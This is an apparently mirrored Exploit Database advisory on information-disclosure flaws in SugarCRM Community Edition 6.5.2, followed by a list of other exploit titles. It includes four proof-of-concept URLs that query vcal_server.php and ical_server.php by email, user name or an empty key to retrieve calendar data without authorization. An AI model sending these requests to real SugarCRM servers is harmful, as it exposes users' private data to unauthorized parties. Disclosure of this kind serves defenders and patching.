SugarCRM Community Edition – Multiple Information Disclosure Vulnerabilities

Exploit Database
37 阅读

作者： Brendan Coles

日期： 2012-08-31
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/37691/

source: https://www.securityfocus.com/bid/55347/info

SugarCRM Community Edition is prone to multiple information-disclosure vulnerabilities because it fails to restrict access to certain application data.

Attackers can exploit these issues to obtain sensitive information that may lead to further attacks.

SugarCRM Community Edition 6.5.2 is vulnerable; other versions may also be affected.

http://www.example.com/sugarcrm/vcal_server.php?type=vfb&email=will@example.com

http://www.example.com/sugarcrm/vcal_server.php?type=vfb&user_name=will

http://www.example.com/sugarcrm/ical_server.php?type=ics&key=&email=will@example.com

http://www.example.com/sugarcrm/ical_server.php?type=ics&key=&user_name=will

last Exploits
SugarCRM Community Edition – Multiple Information Disclosure Vulnerabilities的更多信息

COVID19 Testing Management System 1.0 – ‘Multiple’ SQL Injections：
WordPress Plugin Banners Lite – ‘wpbanners_show.php’ HTML Injection：
WordPress Plugin SP Project & Document Manager 4.21 – Remote Code Execution (RCE) (Authenticated)：
iScripts EasyCreate 3.0 – Remote Code Execution：
IBM Business Process Manager – User Account Reconfiguration：
Pfsense 2.3.4 / 2.4.4-p3 – Remote Code Injection：
Joomla! Component com_sbsfile – Local File Inclusion：
winwebmail server 3.8.1.6 – Persistent Cross-Site Scripting：